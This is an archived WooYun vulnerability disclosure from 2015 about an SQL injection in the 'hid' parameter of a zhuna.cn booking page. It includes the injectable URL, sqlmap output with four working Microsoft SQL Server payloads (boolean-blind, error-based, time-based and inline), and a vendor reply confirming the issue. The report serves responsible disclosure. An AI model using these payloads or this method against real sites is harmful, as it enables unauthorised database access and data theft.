乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-09: 细节已通知厂商并且等待厂商处理中 2015-03-09: 厂商已经确认,细节仅向厂商公开 2015-03-19: 细节向核心白帽子及相关领域专家公开 2015-03-29: 细节向普通白帽子公开 2015-04-08: 细节向实习白帽子公开 2015-04-23: 细节向公众公开
住哪网主站存在SQL注入漏洞
注入点
http://www.zhuna.cn/e/b2.php?hid=88952634&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10#47436f33-d5e2-4310-8d4a-9eec17a9e962
经检测,参数hid存在注入
sqlmap identified the following injection points with a total of 48 HTTP(s) requests:---Place: GETParameter: hid Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) Payload: hid=(SELECT (CASE WHEN (4885=4885) THEN 88952634 ELSE 4885*(SELECT4885 FROM master..sysdatabases) END))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10 Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: hid=-9548 OR 3123=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(120) CHAR(58) (SELECT (CASE WHEN (3123=3123) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(108) CHAR(111) CHAR(100) CHAR(58)))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: hid=-3737 OR 2638=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: hid=(SELECT CHAR(58) CHAR(120) CHAR(122) CHAR(120) CHAR(58) (SELECT (CASE WHEN (4578=4578) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(108) CHAR(111) CHAR(100) CHAR(58))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10---[19:36:04] [INFO] testing Microsoft SQL Server[19:36:04] [INFO] confirming Microsoft SQL Server[19:36:05] [INFO] the back-end DBMS is Microsoft SQL Serverback-end DBMS: Microsoft SQL Server 2008[19:36:05] [INFO] fetching database names
你们专业
危害等级:高
漏洞Rank:20
确认时间:2015-03-09 13:38
非常感谢您反馈的信息,相关修复已交由技术处理。
暂无